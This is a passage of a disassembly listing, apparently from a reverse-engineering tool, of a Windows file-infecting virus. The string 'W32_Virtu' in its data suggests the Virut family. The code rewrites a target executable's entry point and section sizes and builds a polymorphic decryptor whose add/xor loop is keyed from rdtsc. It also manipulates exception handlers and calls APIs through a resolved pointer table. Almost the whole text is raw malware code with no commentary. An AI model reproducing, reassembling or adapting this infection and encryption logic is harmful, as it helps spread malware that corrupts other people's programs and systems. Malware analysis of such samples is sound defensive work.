mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3150D46B
neg dword ptr [eax]
loc_3150D46B: ; CODE XREF: sub_3150D249+21E�j
push ecx
call sub_3150D125
pop ecx
jmp short loc_3150D480
; ---------------------------------------------------------------------------
loc_3150D474: ; CODE XREF: sub_3150D249+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3150D480: ; CODE XREF: sub_3150D249+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3150D488: ; CODE XREF: sub_3150D249+191�j
; sub_3150D249+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3150D4A1
imul edx, 12345678h
loc_3150D4A1: ; CODE XREF: sub_3150D249+250�j
mov [eax-1], dl
call sub_3150B475
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3150D4D2
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3150D4D2: ; CODE XREF: sub_3150D249+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3150D4F7
push edx
call sub_3150CE1D
pop edx
loc_3150D4F7: ; CODE XREF: sub_3150D249+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3150D502
mov [ebx+28h], ecx
loc_3150D502: ; CODE XREF: sub_3150D249+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3150D513
mov [edx+8], ecx
loc_3150D513: ; CODE XREF: sub_3150D249+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3150D544
add ecx, [ebp+40106Dh]
loc_3150D544: ; CODE XREF: sub_3150D249+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3150D566
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3150D566
mov dh, [ebp+403430h]
loc_3150D566: ; CODE XREF: sub_3150D249+307�j
; sub_3150D249+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3150D57D
loc_3150D572: ; CODE XREF: sub_3150D249+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3150D572
jmp short loc_3150D586
; ---------------------------------------------------------------------------
loc_3150D57D: ; CODE XREF: sub_3150D249+327�j
; sub_3150D249+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3150D57D
loc_3150D586: ; CODE XREF: UPX2:3150D244�j
; sub_3150D249+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3150D249 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150D58F proc near ; CODE XREF: sub_3150D249+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3150D124
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3150D5A8: ; CODE XREF: sub_3150D053+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3150D5D0: ; CODE XREF: sub_3150D053+6B�j
; sub_3150D053+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3150D5DC: ; CODE XREF: sub_3150D053+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3150D58F endp
; ---------------------------------------------------------------------------
db 0E8h
dd 0
dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
dd 0E8004034h, 0FFFFE539h, 4C261h, 3020601h, 22B30705h
dd 60EFB400h, 10CC15FFh, 900100h, 3Fh dup(0)
dd 63000000h, 0DE77E779h, 7D77E737h, 0FD77F515h, 77E7A5h
dd 2 dup(0)
dd 72000000h, 3777E746h, 9777E7A8h, 0B877E777h, 8377E61Bh
dd 3777E7AAh, 0E777E7ACh, 4977EBB1h, 2477E73Ch, 0AB77E794h
dd 0EF77E74Ch, 0E277E793h, 9377E73Ch, 8F77E79Fh, 3477E6AFh
dd 8677E6ADh, 5777E7C4h, 0D877E7C6h, 7677E805h, 1577E74Dh
dd 0B777E7C8h, 9577E706h, 0E977EBA5h, 9677EBA6h, 1A77E703h
dd 0E677E701h, 4C77E61Bh, 9077E77Ch, 0A77E750h, 8C77E798h
dd 6377E79Dh, 377F7E4h, 0A377F7E6h, 0B377F7E6h, 0D377F7E6h
dd 7377F7E6h, 0F377F7EAh, 6377F7EAh, 4377F7EBh, 377F7ECh
dd 3377F7F5h, 77F526h, 15h dup(0)
dd 380036h, 3150D90Ch, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 6900h, 0Ch dup(0)
dd 0FDF00000h, 7Fh, 18E5h dup(0)
UPX2 ends
; Section 4. (virtual address 00014000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00014000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31514000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start